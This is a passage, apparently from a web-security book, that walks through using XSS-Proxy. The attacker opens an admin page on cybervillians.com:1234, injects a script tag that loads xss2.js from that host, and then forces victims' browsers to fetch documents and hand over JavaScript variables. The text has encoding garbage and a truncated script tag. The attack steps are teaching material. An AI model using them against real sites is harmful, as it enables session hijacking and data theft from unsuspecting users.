cybervillians.com,
connect to http://www.cybervillians.com:1234/admin.
5. The administrative interface is now loaded. This page does not use JavaScript,
so the attacker must manually refresh the page to look for victim connections.
For an example, see Figure 4-1.
6. Perform a XSS attack against the victim and inject the code
src=http://www.cybervillians.com:1234/xss2.js>
where http://www.cybervillians.com is the $code_server entered and 1234
is the $PORT entered.
7. Refresh the administrative interface. The victim??™s host should show up under
the Clients section of the XSS_Proxy interface. The attacker can now either use
the Fetch Document section to force the victim to fetch documents or use the
Evaluate section to obtain JavaScript functions and variables from the client.
See Figure 4-2.
8. To force a victim to fetch a document, the attacker ?¬? lls in the two text boxes in
the Fetch Document section and clicks Submit. The text box on the left takes
the victim??™s session number. The session numbers start at 0 and increment by 1.
Therefore, if the attacker wants to force the ?¬? rst victim that connected to XSSproxy
to fetch a document, a 0 would be added to the left text box.
Pages:
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192